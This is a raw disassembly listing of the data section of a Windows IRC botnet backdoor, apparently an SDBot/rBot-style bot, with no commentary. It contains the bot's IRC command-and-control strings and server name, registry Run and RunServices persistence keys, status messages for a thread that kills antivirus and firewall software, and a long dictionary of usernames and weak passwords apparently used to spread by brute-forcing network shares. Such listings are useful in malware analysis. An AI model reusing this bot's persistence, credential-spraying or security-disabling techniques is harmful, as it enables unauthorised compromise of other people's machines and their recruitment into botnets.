aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_406EDE+78�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 10h
dd 3 dup(0)
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_406EDE+4B�o
dd 2 dup(0)
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: .text:004078B4�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
dd 3 dup(0)
unk_42C868 db 2 ; DATA XREF: .text:00407AFC�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 64h
db 65h ; e
db 6Eh, 74h, 1Fh
db 64h ; d
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aErrorServerF_0 db ' Error: server failed, returned: <%d>.',0
align 4
dd 3 dup(0)
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: .text:00407AA1�o
align 10h
unk_42C8D0 db 2 ; DATA XREF: .text:00407A49�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 64h
db 65h ; e
db 6Eh, 74h, 1Fh
db 64h ; d
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aClientConnecti db ' Client connection from IP: %s:%d.',0
align 4
dd 3 dup(0)
dword_42C918 dd 1F44h ; DATA XREF: sub_407BA3+581�r
; sub_407BA3+634�r
dword_42C91C dd 1F44h ; DATA XREF: sub_407BA3+680�r
dword_42C920 dd 2B2h ; DATA XREF: sub_403661+3B�r
; sub_4087B3+3D20�r
dword_42C924 dd 320h ; DATA XREF: sub_403661:loc_403910�r
; sub_4087B3:loc_40C5C5�r
dword_42C928 dd 7 ; DATA XREF: sub_41220B+2B�r
; sub_41220B+51�r ...
dword_42C92C dd 5 ; DATA XREF: sub_40841B+78�r
; sub_4087B3+27C�r ...
dword_42C930 dd 1 ; DATA XREF: sub_4087B3+662�r
dword_42C934 dd 1 ; DATA XREF: sub_407BA3+13D�r
dword_42C938 dd 1 ; DATA XREF: sub_407BA3:loc_407EE4�r
; sub_40FF61+C�r
a2009 db '2009',0
align 4
aAdmin db 'admin',0
align 4
aAdmin_0 db 'admin',0
byte_42C952 db 2Eh ; DATA XREF: sub_40537B:loc_405387�r
; sub_4087B3+6CD�r ...
align 4
dword_42C954 dd 3158h ; DATA XREF: sub_407BA3+5D�o
; sub_4087B3+2C4D�o ...
aXPsy db 'X Psy',0 ; DATA XREF: sub_4087B3:loc_40CEEB�o
align 10h
aAscl33t db 'ascl33t',0 ; DATA XREF: sub_4087B3+48C4�o
; sub_4087B3+4993�o
aS1_ascnet_biz db 's1.ascnet.biz',0 ; DATA XREF: sub_407BA3+56D�o
; sub_407BA3+625�o
align 4
asc_42C978 db '##x',0 ; DATA XREF: sub_407BA3+58D�o
; sub_407BA3+63B�o
aG1g db 'g1g',0 ; DATA XREF: sub_407BA3+5A4�o
; sub_407BA3+64D�o
aGig db '##gig##',0 ; DATA XREF: sub_407BA3+687�o
aKeyzzz db 'keyzzz',0 ; DATA XREF: sub_407BA3+699�o
align 10h
aQjmk_exe db 'qjmk.exe',0 ; DATA XREF: sub_402413+3E�o
; sub_402B90+81�o ...
align 4
aSys_txt db 'sys.txt',0
aJava db 'Java',0 ; DATA XREF: sub_404954+E�o
align 4
aAwk db 'awk-',0 ; DATA XREF: sub_41220B+12�o
align 4
aGetwaylayer_ex db 'GetWayLayer.exe',0
aXRi db '-x+Ri',0 ; DATA XREF: sub_4087B3+4A0C�o
align 4
aAwk1 db '##awk1',0 ; DATA XREF: sub_4087B3:loc_40AB01�o
; sub_4087B3+3B78�o ...
align 4
aAwk1_0 db '##awk1',0
align 4
aAwk1_1 db '##awk1',0
align 4
off_42C9E4 dd offset aX@asc_gov ; DATA XREF: sub_4087B3:loc_40D0D3�o
; "x@asc.gov"
off_42C9E8 dd offset aEggdropV1_6_17 ; DATA XREF: sub_4087B3+846�r
; sub_4087B3+493C�o
; "eggdrop v1.6.17"
dd offset aEggdropV1_6_16 ; "eggdrop v1.6.16"
dd offset aEggdropV1_6_15 ; "eggdrop v1.6.15"
dd offset aEggdropV1_6_14 ; "eggdrop v1.6.14"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
align 4
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
align 10h
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_412976+28�o
; sub_412D63+28�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_412976+D4�o
; sub_412D63+D4�o
align 10h
dd offset byte_4370BC
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_1 ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
dd offset aLinux ; "linux"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
align 8
dd offset byte_4370BC
dd offset aAdmin_1 ; "admin"
dd offset aAdmin_2 ; "ADMIN"
dd offset aAdmin_3 ; "Admin"
dd offset aAdmin123 ; "admin123"
dd offset aAdministrado_0 ; "Administrador"
dd offset aAdministrate_0 ; "Administrateur"
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrato_1 ; "ADMINISTRATOR"
dd offset aAdministrator ; "Administrator"
dd offset aAdministrato_0 ; "administrator"
dd offset aGuest_0 ; "guest"
dd offset aGuest ; "Guest"
dd offset aDefault ; "default"
dd offset aDefault_0 ; "DEFAULT"
dd offset aDefault_1 ; "Default"
dd offset aLocal ; "LOCAL"
dd offset aRootpassword ; "rootpassword"
dd offset aPassword ; "PASSWORD"
dd offset aPassword_0 ; "Password"
dd offset aSystem ; "system"
dd offset aSystem_0 ; "SYSTEM"
dd offset aUser_1 ; "user"
dd offset aUser ; "USER"
dd offset aUser_2 ; "User"
dd offset aGuest_1 ; "GUEST"
dd offset aRoot_0 ; "ROOT"
dd offset aAdmin_2 ; "ADMIN"
dd offset aPassword ; "PASSWORD"
dd offset aTemp ; "TEMP"
dd offset aShare_0 ; "SHARE"
dd offset aWrite ; "WRITE"
dd offset aFull_0 ; "FULL"
dd offset aBoth ; "BOTH"
dd offset aRead ; "READ"
dd offset aFiles ; "FILES"
dd offset aDemo ; "DEMO"
dd offset aTest ; "TEST"
dd offset aAccess ; "ACCESS"
dd offset aUser ; "USER"
dd offset aBackup ; "BACKUP"
dd offset aSystem_0 ; "SYSTEM"
dd offset aServer_1 ; "SERVER"
dd offset aLocal ; "LOCAL"
dd offset asc_42CE88 ; "%"
dd offset aPass_0 ; "pass"
dd offset aPasswd ; "passwd"
dd offset aDatabase ; "database"
dd offset aAbcd ; "abcd"
dd offset aAbc123 ; "abc123"
dd offset asc_42CE64 ; "x"
dd offset aXx ; "xx"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aXxxxxx ; "xxxxxx"
dd offset aXxxxxxx ; "xxxxxxx"
dd offset aXxxxxxxx ; "xxxxxxxx"
dd offset aXxxxxxxxx ; "xxxxxxxxx"
dd offset dword_42A180
dd offset a00 ; "00"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a000000 ; "000000"
dd offset a1 ; "1"
dd offset a111 ; "111"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a123456 ; "123456"
dd offset a654321 ; "654321"
dd offset a@_0 ; "!@#$"
dd offset aAsdf ; "asdf"
dd offset aAsdfgh ; "asdfgh"
dd offset a@_1 ; "!@#$%"
dd offset a@_2 ; "!@#$%^"
dd offset a@_3 ; "!@#$%^&"
dd offset a@_4 ; "!@#$%^&*"
dd offset aGuest ; "Guest"
dd offset aGast ; "Gast"
dd offset aServer_2 ; "server"
dd offset aWindowsxp ; "WindowsXP"
dd offset aDude ; "dude"
dd offset aOwned ; "owned"
dd offset dword_42CD6C
align 10h
dword_42CCB0 dd 10h ; DATA XREF: sub_40448A+72�w
; sub_4087B3+731�r ...
dd 2Eh dup(0)
dword_42CD6C dd 6C6F6Ch ; DATA XREF: .data:0042CCA8�o
aOwned db 'owned',0 ; DATA XREF: .data:0042CCA4�o
align 4
aDude db 'dude',0 ; DATA XREF: .data:0042CCA0�o
align 10h
aWindowsxp db 'WindowsXP',0 ; DATA XREF: .data:0042CC9C�o
align 4
aServer_2 db 'server',0 ; DATA XREF: .data:0042CC98�o
align 4
aGast db 'Gast',0 ; DATA XREF: .data:0042CC94�o
align 4
a@_4 db '!@#$%^&*',0 ; DATA XREF: .data:0042CC8C�o
align 4
a@_3 db '!@#$%^&',0 ; DATA XREF: .data:0042CC88�o
dd 0
a@_2 db '!@#$%^',0 ; DATA XREF: .data:0042CC84�o
align 4
a@_1 db '!@#$%',0 ; DATA XREF: .data:0042CC80�o
align 4
aAsdfgh db 'asdfgh',0 ; DATA XREF: .data:0042CC7C�o
align 4
aAsdf db 'asdf',0 ; DATA XREF: .data:0042CC78�o
align 4
a@_0 db '!@#$',0 ; DATA XREF: .data:0042CC74�o
align 4
a654321 db '654321',0 ; DATA XREF: .data:0042CC70�o
align 4
a123456 db '123456',0 ; DATA XREF: .data:0042CC6C�o
align 4
a1234 db '1234',0 ; DATA XREF: .data:0042CC68�o
align 4
a123 db '123',0 ; DATA XREF: .data:0042CC64�o
a111 db '111',0 ; DATA XREF: .data:0042CC60�o
a1: ; DATA XREF: .data:0042CC5C�o
unicode 0, <1>,0
a000000 db '000000',0 ; DATA XREF: .data:0042CC58�o
align 4
a00000 db '00000',0 ; DATA XREF: .data:0042CC54�o
align 10h
a0000 db '0000',0 ; DATA XREF: .data:0042CC50�o
align 4
a000 db '000',0 ; DATA XREF: .data:0042CC4C�o
a00 db '00',0 ; DATA XREF: .data:0042CC48�o
align 10h
aXxxxxxxxx db 'xxxxxxxxx',0 ; DATA XREF: .data:0042CC40�o
align 4
aXxxxxxxx db 'xxxxxxxx',0 ; DATA XREF: .data:0042CC3C�o
align 4
aXxxxxxx db 'xxxxxxx',0 ; DATA XREF: .data:0042CC38�o
dd 0
aXxxxxx db 'xxxxxx',0 ; DATA XREF: .data:0042CC34�o
align 4
aXxxxx db 'xxxxx',0 ; DATA XREF: .data:0042CC30�o
align 4
aXxxx db 'xxxx',0 ; DATA XREF: .data:0042CC2C�o
align 4
aXxx db 'xxx',0 ; DATA XREF: .data:0042CC28�o
aXx db 'xx',0 ; DATA XREF: .data:0042CC24�o
align 4
asc_42CE64: ; DATA XREF: .data:0042CC20�o
unicode 0, <x>,0
aAbc123 db 'abc123',0 ; DATA XREF: .data:0042CC1C�o
align 10h
aAbcd db 'abcd',0 ; DATA XREF: .data:0042CC18�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:0042CC10�o
align 10h
aPass_0 db 'pass',0 ; DATA XREF: .data:0042CC0C�o
align 4
asc_42CE88: ; DATA XREF: .data:0042CC08�o
unicode 0, <%>,0
aServer_1 db 'SERVER',0 ; DATA XREF: .data:0042CC00�o
align 4
aBackup db 'BACKUP',0 ; DATA XREF: .data:0042CBF8�o
align 4
aAccess db 'ACCESS',0 ; DATA XREF: .data:0042CBF0�o
align 4
aTest db 'TEST',0 ; DATA XREF: .data:0042CBEC�o
align 4
aDemo db 'DEMO',0 ; DATA XREF: .data:0042CBE8�o
align 4
aFiles db 'FILES',0 ; DATA XREF: .data:0042CBE4�o
align 4
aRead db 'READ',0 ; DATA XREF: .data:0042CBE0�o
align 4
aBoth db 'BOTH',0 ; DATA XREF: .data:0042CBDC�o
align 4
aFull_0 db 'FULL',0 ; DATA XREF: .data:0042CBD8�o
align 4
aWrite db 'WRITE',0 ; DATA XREF: .data:0042CBD4�o
align 4
aShare_0 db 'SHARE',0 ; DATA XREF: .data:0042CBD0�o
align 4
aTemp db 'TEMP',0 ; DATA XREF: .data:0042CBCC�o
align 4
aRoot_0 db 'ROOT',0 ; DATA XREF: .data:0042CBC0�o
align 4
aGuest_1 db 'GUEST',0 ; DATA XREF: .data:0042CBBC�o
align 4
aUser_2 db 'User',0 ; DATA XREF: sub_410B94:loc_410CA6�o
; .data:0042CBB8�o
align 4
aUser_1 db 'user',0 ; DATA XREF: sub_4087B3+1854�o
; .data:0042CBB0�o
align 4
aSystem_0 db 'SYSTEM',0 ; DATA XREF: .data:0042CBAC�o
; .data:0042CBFC�o
align 4
aSystem db 'system',0 ; DATA XREF: .data:0042CBA8�o
align 4
aPassword_0 db 'Password',0 ; DATA XREF: .data:0042CBA4�o
align 4
aPassword db 'PASSWORD',0 ; DATA XREF: .data:0042CBA0�o
; .data:0042CBC8�o
align 4
aRootpassword db 'rootpassword',0 ; DATA XREF: .data:0042CB9C�o
align 4
aLocal db 'LOCAL',0 ; DATA XREF: .data:0042CB98�o
; .data:0042CC04�o
align 4
aDefault_1 db 'Default',0 ; DATA XREF: .data:0042CB94�o
align 8
aDefault_0 db 'DEFAULT',0 ; DATA XREF: .data:0042CB90�o
dd 0
aGuest db 'Guest',0 ; DATA XREF: sub_410B94:loc_410CAD�o
; .data:0042CB88�o ...
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_410B94:loc_410C9F�o
; .data:0042CB7C�o
align 4
aAdministrato_1 db 'ADMINISTRATOR',0 ; DATA XREF: .data:0042CB78�o
align 4
aAdministrate_0 db 'Administrateur',0 ; DATA XREF: .data:0042CB70�o
align 10h
aAdministrado_0 db 'Administrador',0 ; DATA XREF: .data:0042CB6C�o
align 10h
aAdmin123 db 'admin123',0 ; DATA XREF: .data:0042CB68�o
align 4
aAdmin_3 db 'Admin',0 ; DATA XREF: .data:0042CB64�o
align 4
aAdmin_2 db 'ADMIN',0 ; DATA XREF: .data:0042CB60�o
; .data:0042CBC4�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:0042CB50�o
align 4
aKatie db 'katie',0 ; DATA XREF: .data:0042CB4C�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:0042CB44�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:0042CB40�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:0042CB3C�o
align 4
aChris db 'chris',0 ; DATA XREF: .data:0042CB38�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:0042CB34�o
aNeil db 'neil',0 ; DATA XREF: .data:0042CB30�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:0042CB2C�o
aBrian db 'brian',0 ; DATA XREF: .data:0042CB28�o
align 4
aSusan db 'susan',0 ; DATA XREF: .data:0042CB20�o
align 4
aSue db 'sue',0 ; DATA XREF: .data:0042CB1C�o
aSam db 'sam',0 ; DATA XREF: .data:0042CB18�o
aLuke db 'luke',0 ; DATA XREF: .data:0042CB14�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:0042CB10�o
; .data:0042CB24�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:0042CB0C�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0042CB08�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:0042CB04�o
align 4
aFred db 'fred',0 ; DATA XREF: .data:0042CB00�o
align 4
aJoe db 'joe',0 ; DATA XREF: .data:0042CAFC�o
aJen db 'jen',0 ; DATA XREF: .data:0042CAF8�o
aBob db 'bob',0 ; DATA XREF: .data:0042CAF4�o
; .data:0042CB48�o
aLinux db 'linux',0 ; DATA XREF: .data:0042CAF0�o
align 4
aDb2 db 'db2',0 ; DATA XREF: .data:0042CAEC�o
aOracle db 'oracle',0 ; DATA XREF: .data:0042CAE8�o
align 4
aDba db 'dba',0 ; DATA XREF: .data:0042CAE4�o
aDatabase db 'database',0 ; DATA XREF: .data:0042CAE0�o
; .data:0042CC14�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:0042CADC�o
; .data:0042CB8C�o
align 10h
aGuest_0 db 'guest',0 ; DATA XREF: .data:0042CAD8�o
; .data:0042CB84�o
align 4
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0042CAD4�o
align 4
aTeacher db 'teacher',0 ; DATA XREF: .data:0042CAD0�o
align 10h
aStudent db 'student',0 ; DATA XREF: .data:0042CACC�o
dd 0
aOwner db 'owner',0 ; DATA XREF: .data:0042CAC8�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0042CAC4�o
align 10h
aRoot db 'root',0 ; DATA XREF: .data:0042CAC0�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0042CABC�o
align 10h
aAdmin_1 db 'admin',0 ; DATA XREF: .data:0042CAB8�o
; .data:0042CB5C�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .data:0042CAB4�o
align 10h
aAdministrat db 'administrat',0 ; DATA XREF: .data:0042CAB0�o
align 10h
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0042CAAC�o
align 10h
dd 0
aAdministrador db 'administrador',0 ; DATA XREF: .data:0042CAA8�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:0042CAA4�o
; .data:0042CB74�o ...
align 4
aEggdropV1_6_14 db 'eggdrop v1.6.14',0 ; DATA XREF: .data:0042C9F4�o
align 8
aEggdropV1_6_15 db 'eggdrop v1.6.15',0 ; DATA XREF: .data:0042C9F0�o
dd 0
aEggdropV1_6_16 db 'eggdrop v1.6.16',0 ; DATA XREF: .data:0042C9EC�o
align 10h
aEggdropV1_6_17 db 'eggdrop v1.6.17',0 ; DATA XREF: .data:off_42C9E8�o
dd 0
aX@asc_gov db 'x@asc.gov',0 ; DATA XREF: .data:off_42C9E4�o
align 10h
unk_42D190 db 2 ; DATA XREF: sub_407BA3+548�o
; sub_4087B3+165C�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 64h
db 65h ; e
db 6Eh, 74h, 1Fh
db 64h ; d
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToStar_3 db ' Failed to start server, error: <%d>.',0
align 10h
dd 3 dup(0)
unk_42D1DC db 2 ; DATA XREF: sub_407BA3+4FD�o
; sub_4087B3+160F�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 64h
db 65h ; e
db 6Eh, 74h, 1Fh
db 64h ; d
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aServerRunningO db ' Server running on Port: 113.',0
align 4
dd 2 dup(0)
unk_42D21C db 2 ; DATA XREF: sub_407BA3+4D0�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToStartR db ' Failed to start registry thread, error: <%d>.',0
align 10h
unk_42D270 db 2 ; DATA XREF: sub_407BA3+47D�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aRegistryMonito db ' Registry monitor active.',0
align 4
dd 2 dup(0)
unk_42D2AC db 2 ; DATA XREF: sub_407BA3+45D�o
; sub_4087B3+4713�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToStar_4 db ' Failed to start secure thread, error: <%d>.',0
dd 4 dup(0)
unk_42D300 db 2 ; DATA XREF: sub_407BA3+410�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 65h
db 63h ; c
db 75h, 72h, 1Fh
db 65h ; e
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aSystemSecureMo db ' System secure monitor active.',0
align 10h
unk_42D340 db 2 ; DATA XREF: sub_407BA3+3F0�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 70h, 72h
db 6Fh ; o
db 63h, 1Fh, 73h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0
align 4
dd 3 dup(0)
unk_42D398 db 2 ; DATA XREF: sub_407BA3+39F�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 70h, 72h
db 6Fh ; o
db 63h, 1Fh, 73h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aAvFwKillerActi db ' AV/FW Killer active.',0
dd 2 dup(0)
dword_42D3CC dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_407BA3+364�o
dd 746F4220h, 61747320h, 64657472h, 2Eh, 0
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_407BA3+28F�o
align 10h
dd 0
aSS_2 db '%s\%s',0 ; DATA XREF: sub_407BA3+189�o
align 4
unk_42D40C db 2 ; DATA XREF: sub_40841B+F2�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aConnectedToS_ db ' Connected to %s.',0
align 4
dd 2 dup(0)
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_4085DD+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
dd 0
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_4085DD+35�o
align 4
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+4A14�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+49FF�o
align 4
unk_42D488 db 2 ; DATA XREF: sub_4087B3+49F2�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aUserSLoggedIn_ db ' User: %s logged in.',0
align 4
dd 2 dup(0)
unk_42D4BC db 2 ; DATA XREF: sub_4087B3+49D5�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aPasswordAccept db ' Password accepted.',0
dd 2 dup(0)
unk_42D4EC db 2 ; DATA XREF: sub_4087B3+4977�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aFailedHostAuth db ' *Failed host auth by: (%s!%s).',0
dd 3 dup(0)
unk_42D52C db 2 ; DATA XREF: sub_4087B3+4907�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aFailedPassAuth db ' Failed pass auth by: (%s!%s).',0
align 10h
dd 3 dup(0)
aNoticeSFaile_0 db 'NOTICE %s :Failed.',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+48F8�o
; sub_4087B3+4968�o
align 8
aNoticeSFailed_ db 'NOTICE %s :Failed. (%s!%s).',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+48E4�o
; sub_4087B3+4954�o
align 4
dd 0
asc_42D5AC: ; DATA XREF: sub_4087B3+48B4�o
unicode 0, <~>,0
unk_42D5B0 db 2 ; DATA XREF: sub_4087B3+4863�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aRandomNickChan db ' Random nick change: %s',0
dd 2 dup(0)
unk_42D5E4 db 2 ; DATA XREF: sub_4087B3+47A9�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aInvalidLoginSl db ' Invalid login slot number: %d.',0
dd 3 dup(0)
unk_42D624 db 2 ; DATA XREF: sub_4087B3+47A1�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aNoUserLoggedIn db ' No user logged in at slot: %d.',0
dd 3 dup(0)
dword_42D664 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+473D�o
dd 732520h, 0
dword_42D680 dd 20025B02h, 6573202Dh, 1F727563h, 2D201F65h, 25D0220h
; DATA XREF: sub_4087B3+469D�o
dd 2020BB20h, 73207325h, 65747379h, 2E6Dh, 2 dup(0)
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_4087B3+4697�o
align 4
dd 0
aSecuring db 'Securing',0 ; DATA XREF: sub_4087B3+4690�o
align 4
dword_42D6C8 dd 20025B02h, 7270202Dh, 631F636Fh, 202D201Fh, 20025D02h
; DATA XREF: sub_4087B3+4619�o
dd 0BBh, 0
aProcessList db 'Process list',0 ; DATA XREF: sub_4087B3+4614�o
align 4
dword_42D6F4 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+45DE�o
dd 63655220h, 656E6E6Fh, 6E697463h, 2E67h, 2 dup(0)
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_4087B3:loc_40CD84�o
align 4
dd 0
dword_42D73C dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+45BC�o
dd 73694420h, 6E6E6F63h, 69746365h, 2E676Eh, 2 dup(0)
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_4087B3:loc_40CD62�o
align 10h
dd 0
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+4587�o
align 10h
dd 0
unk_42D794 db 2 ; DATA XREF: sub_4087B3+453B�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aStatusReady_Bo db ' Status: Ready. Bot Uptime: %s.',0
dd 3 dup(0)
dword_42D7D4 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+44FD�o
dd 746F4220h, 3A444920h, 2E732520h, 2 dup(0)
unk_42D7FC db 2 ; DATA XREF: sub_4087B3+44CC�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 74h, 68h
db 72h ; r
db 65h, 61h, 64h
db 1Fh
db 73h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aFailedToStartL db ' Failed to start list thread, error: <%d>.',0
align 10h
dd 3 dup(0)
dword_42D84C dd 20025B02h, 6874202Dh, 64616572h, 201F731Fh, 5D02202Dh
; DATA XREF: sub_4087B3+4461�o
dd 20BB2002h, 73694C20h, 68742074h, 64616572h, 2E73h, 2 dup(0)
dword_42D87C dd 627573h ; DATA XREF: sub_4087B3+443B�o
dword_42D880 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+43E9�o
dd 696C4120h, 6C207361h, 2E747369h, 2 dup(0)
unk_42D8A8 db 2 ; DATA XREF: sub_4087B3+43CE�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Ch, 6Fh
db 1Fh
db 67h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aFailedToStar_5 db ' Failed to start listing thread, error: <%d>.',0
align 4
dd 3 dup(0)
dword_42D8F8 dd 20025B02h, 6F6C202Dh, 201F671Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+4341�o
dd 73694C20h, 676E6974h, 676F6C20h, 2Eh, 0
dword_42D920 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+42BD�o
dd 74654E20h, 6B726F77h, 666E4920h, 2E6Fh, 2 dup(0)
dword_42D94C dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+428E�o
dd 73795320h, 206D6574h, 6F666E49h, 2Eh, 0
dword_42D974 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+4239�o
